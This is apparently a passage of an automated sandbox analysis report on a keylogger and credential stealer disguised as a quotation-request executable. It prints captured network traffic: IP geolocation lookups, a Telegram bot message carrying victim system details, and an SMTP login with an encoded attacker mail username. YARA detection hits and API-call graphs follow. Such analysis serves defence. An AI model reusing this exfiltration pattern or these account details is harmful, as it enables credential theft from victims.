                                                                                    2024-10-08 13:10:28 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                    2024-10-08 13:10:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6192.168.2.649812188.114.96.34436456C:\Users\user\Desktop\Request for Quotation Plug Valve.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-08 13:10:29 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                    Host: reallyfreegeoip.org
                                                                                    Connection: Keep-Alive
                                                                                    2024-10-08 13:10:29 UTC676INHTTP/1.1 200 OK
                                                                                    Date: Tue, 08 Oct 2024 13:10:29 GMT
                                                                                    Content-Type: application/xml
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    access-control-allow-origin: *
                                                                                    vary: Accept-Encoding
                                                                                    Cache-Control: max-age=86400
                                                                                    CF-Cache-Status: HIT
                                                                                    Age: 59361
                                                                                    Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mIcbmUZIqNBo2cy9AA1gg8Krs7Zeey3rnGUWpNqIjTp0B90CuTyGOhA%2FiDSl4yumKcfc%2FMhcyLWjWrKlgjoV7hLQCLvTeK9E7TaDivOfjfoU7E%2F266T01m5ZbtjcMbLxGOgX7Btz"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8cf65f152a644369-EWR
                                                                                    2024-10-08 13:10:29 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                    2024-10-08 13:10:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7192.168.2.649821188.114.96.34436456C:\Users\user\Desktop\Request for Quotation Plug Valve.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-08 13:10:30 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                    Host: reallyfreegeoip.org
                                                                                    Connection: Keep-Alive
                                                                                    2024-10-08 13:10:31 UTC680INHTTP/1.1 200 OK
                                                                                    Date: Tue, 08 Oct 2024 13:10:31 GMT
                                                                                    Content-Type: application/xml
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    access-control-allow-origin: *
                                                                                    vary: Accept-Encoding
                                                                                    Cache-Control: max-age=86400
                                                                                    CF-Cache-Status: HIT
                                                                                    Age: 59363
                                                                                    Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RK7ydBaYni0sFhCZB6L39kudUI92FWjkVdhoeKpu%2BTa39Tb1%2Bi88ksYHeklZR221EgCvK7An0XwbK9y0ym4%2FIGX6j6ECKXpgd7RzeJZocALSVBP84LTaPSy9I0wz7Vr%2B%2Fw6MEFuS"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8cf65f1bd9c641e6-EWR
                                                                                    2024-10-08 13:10:31 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                    2024-10-08 13:10:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    8192.168.2.649831188.114.96.34436456C:\Users\user\Desktop\Request for Quotation Plug Valve.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-08 13:10:32 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                    Host: reallyfreegeoip.org
                                                                                    2024-10-08 13:10:32 UTC678INHTTP/1.1 200 OK
                                                                                    Date: Tue, 08 Oct 2024 13:10:32 GMT
                                                                                    Content-Type: application/xml
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    access-control-allow-origin: *
                                                                                    vary: Accept-Encoding
                                                                                    Cache-Control: max-age=86400
                                                                                    CF-Cache-Status: HIT
                                                                                    Age: 59364
                                                                                    Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rp2m9F6dQfd%2BOD8cgqYgf1n9PbhOtQTv7rAbwH%2FkhQ2w1FlR7cfK2MLYn4qK4oXW%2FVFReqF1XhpaP%2F1UFRagMjBH2j7Bfr179eeHt955LtMqv3hRkXtNiOiVkwsQ7VbbQdXMfA4a"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8cf65f229f8442e8-EWR
                                                                                    2024-10-08 13:10:32 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                    2024-10-08 13:10:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    9192.168.2.649838149.154.167.2204436456C:\Users\user\Desktop\Request for Quotation Plug Valve.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-08 13:10:32 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:688098%0D%0ADate%20and%20Time:%2008/10/2024%20/%2023:13:49%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20688098%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                    Host: api.telegram.org
                                                                                    Connection: Keep-Alive
                                                                                    2024-10-08 13:10:33 UTC344INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Tue, 08 Oct 2024 13:10:33 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 55
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2024-10-08 13:10:33 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                    Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                    TimestampSource PortDest PortSource IPDest IPCommands
                                                                                    Oct 8, 2024 15:10:39.161602974 CEST58749875208.91.199.223192.168.2.6220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                    Oct 8, 2024 15:10:39.162200928 CEST49875587192.168.2.6208.91.199.223EHLO 688098
                                                                                    Oct 8, 2024 15:10:39.316873074 CEST58749875208.91.199.223192.168.2.6250-us2.outbound.mailhostbox.com
                                                                                    250-PIPELINING
                                                                                    250-SIZE 41648128
                                                                                    250-VRFY
                                                                                    250-ETRN
                                                                                    250-STARTTLS
                                                                                    250-AUTH PLAIN LOGIN
                                                                                    250-AUTH=PLAIN LOGIN
                                                                                    250-ENHANCEDSTATUSCODES
                                                                                    250-8BITMIME
                                                                                    250-DSN
                                                                                    250 CHUNKING
                                                                                    Oct 8, 2024 15:10:39.318073988 CEST49875587192.168.2.6208.91.199.223AUTH login Y2FzaGlzb2tAcG9vb25naGFuYmQuY29t
                                                                                    Oct 8, 2024 15:10:39.475977898 CEST58749875208.91.199.223192.168.2.6334 UGFzc3dvcmQ6
                                                                                    Oct 8, 2024 15:10:39.638111115 CEST58749875208.91.199.223192.168.2.6235 2.7.0 Authentication successful
                                                                                    Oct 8, 2024 15:10:39.638370991 CEST49875587192.168.2.6208.91.199.223MAIL FROM:<cashisok@pooonghanbd.com>
                                                                                    Oct 8, 2024 15:10:39.795197964 CEST58749875208.91.199.223192.168.2.6250 2.1.0 Ok
                                                                                    Oct 8, 2024 15:10:39.795408010 CEST49875587192.168.2.6208.91.199.223RCPT TO:<cashisok@pooonghanbd.com>
                                                                                    Oct 8, 2024 15:10:39.982266903 CEST58749875208.91.199.223192.168.2.6550 5.4.6 <cashisok@pooonghanbd.com>: Recipient address rejected: Email Sending Quota Exceeded

                                                                                    Click to jump to process

                                                                                    Click to jump to process

                                                                                    Click to dive into process behavior distribution

                                                                                    Click to jump to process

                                                                                    Target ID:1
                                                                                    Start time:09:10:15
                                                                                    Start date:08/10/2024
                                                                                    Path:C:\Users\user\Desktop\Request for Quotation Plug Valve.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\Request for Quotation Plug Valve.exe"
                                                                                    Imagebase:0x440000
                                                                                    File size:776'704 bytes
                                                                                    MD5 hash:FA1C425A44A073CEC7F36210A6D7C3E6
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:3
                                                                                    Start time:09:10:16
                                                                                    Start date:08/10/2024
                                                                                    Path:C:\Users\user\Desktop\Request for Quotation Plug Valve.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\Request for Quotation Plug Valve.exe"
                                                                                    Imagebase:0x870000
                                                                                    File size:776'704 bytes
                                                                                    MD5 hash:FA1C425A44A073CEC7F36210A6D7C3E6
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.4707717001.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4707717001.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:low
                                                                                    Has exited:false

                                                                                    Reset < >

                                                                                      Execution Graph

                                                                                      Execution Coverage:7.7%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:0%
                                                                                      Total number of Nodes:27
                                                                                      Total number of Limit Nodes:2
                                                                                      execution_graph 26442 e84668 26443 e84672 26442->26443 26445 e84773 26442->26445 26446 e8478d 26445->26446 26450 e84878 26446->26450 26454 e84873 26446->26454 26451 e8489f 26450->26451 26452 e8497c 26451->26452 26458 e844e0 26451->26458 26452->26452 26456 e8489f 26454->26456 26455 e8497c 26456->26455 26457 e844e0 CreateActCtxA 26456->26457 26457->26455 26459 e85908 CreateActCtxA 26458->26459 26461 e859cb 26459->26461 26466 e8dfd8 26467 e8e01e 26466->26467 26470 e8e1b8 26467->26470 26473 e8d8e0 26470->26473 26474 e8e220 DuplicateHandle 26473->26474 26475 e8e10b 26474->26475 26476 7654730 26477 7654738 CloseHandle 26476->26477 26478 765479f 26477->26478 26462 e8bf40 26463 e8bf88 GetModuleHandleW 26462->26463 26464 e8bf82 26462->26464 26465 e8bfb5 26463->26465 26464->26463

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 11 e844e0-e859c9 CreateActCtxA 14 e859cb-e859d1 11->14 15 e859d2-e85a2c 11->15 14->15 22 e85a3b-e85a3f 15->22 23 e85a2e-e85a31 15->23 24 e85a50 22->24 25 e85a41-e85a4d 22->25 23->22 27 e85a51 24->27 25->24 27->27
                                                                                      APIs
                                                                                      • CreateActCtxA.KERNEL32(?), ref: 00E859B9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2249126947.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_e80000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID: Create
                                                                                      • String ID:
                                                                                      • API String ID: 2289755597-0
                                                                                      • Opcode ID: ae843f4731ad00746a5bb5e2f712ce6394aa858dee913e6dcc2cecfe7d19ce1b
                                                                                      • Instruction ID: ff1981bc178f1ba6ace5cfbeb614b23cfd8f6376a4cf69f05d083ca2455677d7
                                                                                      • Opcode Fuzzy Hash: ae843f4731ad00746a5bb5e2f712ce6394aa858dee913e6dcc2cecfe7d19ce1b
                                                                                      • Instruction Fuzzy Hash: 1F41E271C0071DCBEB24DFA9C984B8DBBB5BF89304F20815AD418BB291DB756945CF90

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 28 e85903-e859c9 CreateActCtxA 30 e859cb-e859d1 28->30 31 e859d2-e85a2c 28->31 30->31 38 e85a3b-e85a3f 31->38 39 e85a2e-e85a31 31->39 40 e85a50 38->40 41 e85a41-e85a4d 38->41 39->38 43 e85a51 40->43 41->40 43->43
                                                                                      APIs
                                                                                      • CreateActCtxA.KERNEL32(?), ref: 00E859B9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2249126947.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_e80000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID: Create
                                                                                      • String ID:
                                                                                      • API String ID: 2289755597-0
                                                                                      • Opcode ID: ba7852aa0a1adc246b94767c69d96d7a629941aa3b4c1c7e2e695822b7206958
                                                                                      • Instruction ID: e643772ef8f7a2b90c1ca797cc8a8d3a3e7fe390709bccec6693ec4f26913a2c
                                                                                      • Opcode Fuzzy Hash: ba7852aa0a1adc246b94767c69d96d7a629941aa3b4c1c7e2e695822b7206958
                                                                                      • Instruction Fuzzy Hash: E241D1B1C00719CBEB24DFA9C98478DBBB6BF49304F20815AD418BB291DB756949CF50

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 44 e8d8e0-e8e2b4 DuplicateHandle 46 e8e2bd-e8e2da 44->46 47 e8e2b6-e8e2bc 44->47 47->46
                                                                                      APIs
                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00E8E1E6,?,?,?,?,?), ref: 00E8E2A7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2249126947.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_e80000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID: DuplicateHandle
                                                                                      • String ID:
                                                                                      • API String ID: 3793708945-0
                                                                                      • Opcode ID: 3ffba60243196d5b7d79726df133f0270fb4e0c83368d556222b47b411cbdfdf
                                                                                      • Instruction ID: 548295e92ac9fe3d4ffe3ef7efd6c7ca9d01e381019be508351ebffc9c189ae2
                                                                                      • Opcode Fuzzy Hash: 3ffba60243196d5b7d79726df133f0270fb4e0c83368d556222b47b411cbdfdf
                                                                                      • Instruction Fuzzy Hash: D321D2B5900249DFDB10CFAAD984ADEBBF8EB48320F14841AE918B3350D374A954CFA4

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 50 e8bf40-e8bf80 51 e8bf88-e8bfb3 GetModuleHandleW 50->51 52 e8bf82-e8bf85 50->52 53 e8bfbc-e8bfd0 51->53 54 e8bfb5-e8bfbb 51->54 52->51 54->53
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 00E8BFA6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2249126947.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_e80000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleModule
                                                                                      • String ID:
                                                                                      • API String ID: 4139908857-0
                                                                                      • Opcode ID: 5d08a0c99ac0cd80668695c613e76ac8ab29d01b80e8c2149a1a44f17681da3d
                                                                                      • Instruction ID: d5b7e6fe9724e7dc08fde98c8fd2255b3bd6ebf6ca190594d96c3730813dc5cc
                                                                                      • Opcode Fuzzy Hash: 5d08a0c99ac0cd80668695c613e76ac8ab29d01b80e8c2149a1a44f17681da3d
                                                                                      • Instruction Fuzzy Hash: 6D110FB6D002498FCB10DF9AC844ADEFBF4AB88324F10841AD918B7250D3B9A945CFA1

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 195 7653c62-765479d CloseHandle 197 76547a6-76547ce 195->197 198 765479f-76547a5 195->198 198->197
                                                                                      APIs
                                                                                      • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,076545E9,?,?), ref: 07654790
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2253885629.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7650000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandle
                                                                                      • String ID:
                                                                                      • API String ID: 2962429428-0
                                                                                      • Opcode ID: 8a0f85cedfc6a115bdd2609ba5be2678053332e4f0e0986960197c4d9dd1b6c3
                                                                                      • Instruction ID: bcbfcdea5bc62e4e27945e83ad5fbf5501eeafcfdb5c1e0fe4a5116a01a29326
                                                                                      • Opcode Fuzzy Hash: 8a0f85cedfc6a115bdd2609ba5be2678053332e4f0e0986960197c4d9dd1b6c3
                                                                                      • Instruction Fuzzy Hash: EE2198B18043499FCB10CF99C480BDEBFF4EF09220F20889ADA58E7251D735A544CBA9

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 201 7653c84-765479d CloseHandle 203 76547a6-76547ce 201->203 204 765479f-76547a5 201->204 204->203
                                                                                      APIs
                                                                                      • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,076545E9,?,?), ref: 07654790
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2253885629.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7650000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandle
                                                                                      • String ID:
                                                                                      • API String ID: 2962429428-0
                                                                                      • Opcode ID: b8b2468fc68c937139f4aaf1006204ba8e8d01c7a99e45ca1ea9d714b3924d4b
                                                                                      • Instruction ID: 0ff1074cd381801dcc201b4f1472caee5513f54ed9bedd3cb1957fb42abf0090
                                                                                      • Opcode Fuzzy Hash: b8b2468fc68c937139f4aaf1006204ba8e8d01c7a99e45ca1ea9d714b3924d4b
                                                                                      • Instruction Fuzzy Hash: C91113B58002498FDB10DF9AC484BDEBBF4EB49320F108459D959A7340D779A944CBA5

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 207 7654730-765479d CloseHandle 209 76547a6-76547ce 207->209 210 765479f-76547a5 207->210 210->209
                                                                                      APIs
                                                                                      • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,076545E9,?,?), ref: 07654790
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2253885629.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7650000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandle
                                                                                      • String ID:
                                                                                      • API String ID: 2962429428-0
                                                                                      • Opcode ID: 446c5f9792427cde2b37d49ec94a8506ecefd8186166f6d5bc4804f3b68203fe
                                                                                      • Instruction ID: c12e64ef1ffd39776b6fb410bc8837141aab64b4f49d4fb5802e80455af2c37d
                                                                                      • Opcode Fuzzy Hash: 446c5f9792427cde2b37d49ec94a8506ecefd8186166f6d5bc4804f3b68203fe
                                                                                      • Instruction Fuzzy Hash: 781113B5800249DFDB10DF9AC485BEEBBF8EF48320F10846AD958A7240D779A544CFA5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2247545912.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_a3d000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e4779e0c667739d898cae1f4a6217de303c08128388cf29b51cf08934dfb4523
                                                                                      • Instruction ID: 9d55c9f04eef539f8e0a53283d26869b82e6b38e7eb3aa26c5ddc77074e51281
                                                                                      • Opcode Fuzzy Hash: e4779e0c667739d898cae1f4a6217de303c08128388cf29b51cf08934dfb4523
                                                                                      • Instruction Fuzzy Hash: 4621F572504244EFDB15DF14E9C0B26BF65FB88318F24C56DF9090B256C336D856CAA1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2247545912.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_a3d000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c60afce6a7c9ff07caba0320496fa4bf8c0db8536a43db258594377eac54dd39
                                                                                      • Instruction ID: ee2b08a9da209e4e1fd359d3fcad769a8765c3c322365d4d7866594a2d4b708c
                                                                                      • Opcode Fuzzy Hash: c60afce6a7c9ff07caba0320496fa4bf8c0db8536a43db258594377eac54dd39
